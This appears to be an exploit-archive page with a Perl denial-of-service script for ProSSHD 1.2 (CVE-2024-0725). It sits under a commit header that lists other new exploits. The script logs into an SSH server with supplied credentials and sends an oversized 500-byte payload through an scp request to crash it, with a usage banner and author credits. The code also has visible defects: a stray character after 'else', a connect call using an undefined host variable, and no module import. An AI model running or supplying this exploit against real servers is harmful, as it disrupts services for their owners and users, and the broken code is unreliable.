c773b14d1c
6 changes to exploits/shellcodes/ghdb Mitel mitel-cs018 - Call Data Information Disclosure SAP NetWeaver - 7.53 - HTTP Request Smuggling ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.08.01 - Arbitrary File Delete Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS ProSSHD 1.2 - Denial of Service (DOS)
68 lines
No EOL
1.4 KiB
Text
68 lines
No EOL
1.4 KiB
Text
# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
|
|
# Google Dork: N/A
|
|
# Date: 13 january 2024
|
|
# Exploit Author: Fernando Mengali
|
|
# Vendor Homepage: https://prosshd.com/
|
|
# Software Link: N/A
|
|
# Version: 1.2 20090726
|
|
# Tested on: Windows XP
|
|
# CVE: CVE-2024-0725
|
|
|
|
$sis="$^O";
|
|
|
|
if ($sis eq "windows"){
|
|
$cmd="cls";
|
|
} else {s
|
|
$cmd="clear";
|
|
}
|
|
|
|
system("$cmd");
|
|
|
|
intro();
|
|
main();
|
|
|
|
print "\t ==> Connecting to webserver... \n\n";
|
|
sleep(1);
|
|
|
|
my $i=0;
|
|
print "\t ==> Exploiting... \n\n";
|
|
|
|
my $payload = "\x41" x 500;
|
|
|
|
$connection2 = Net::SSH2->new();
|
|
$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";
|
|
$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
|
|
$scpget = $connection2->scp_get($payload);
|
|
$connection2->disconnect();
|
|
|
|
print "\t ==> Done! Exploited!";
|
|
sub intro {
|
|
print q {
|
|
|
|
,--,
|
|
_ ___/ /\|
|
|
,;'( )__, ) ~
|
|
// // '--;
|
|
' \ | ^
|
|
^ ^
|
|
|
|
[+] ProSSHD 1.2 20090726 - Denial of Service (DoS)
|
|
|
|
[*] Coded by Fernando Mengali
|
|
|
|
[@] e-mail: fernando.mengalli@gmail.com
|
|
|
|
}
|
|
}
|
|
|
|
sub main {
|
|
|
|
our ($ip, $port, $username, $password) = @ARGV;
|
|
|
|
unless (defined($ip) && defined($port)) {
|
|
|
|
print "\n\tUsage: $0 <ip> <port> <username> <password> \n";
|
|
exit(-1);
|
|
|
|
}
|
|
} |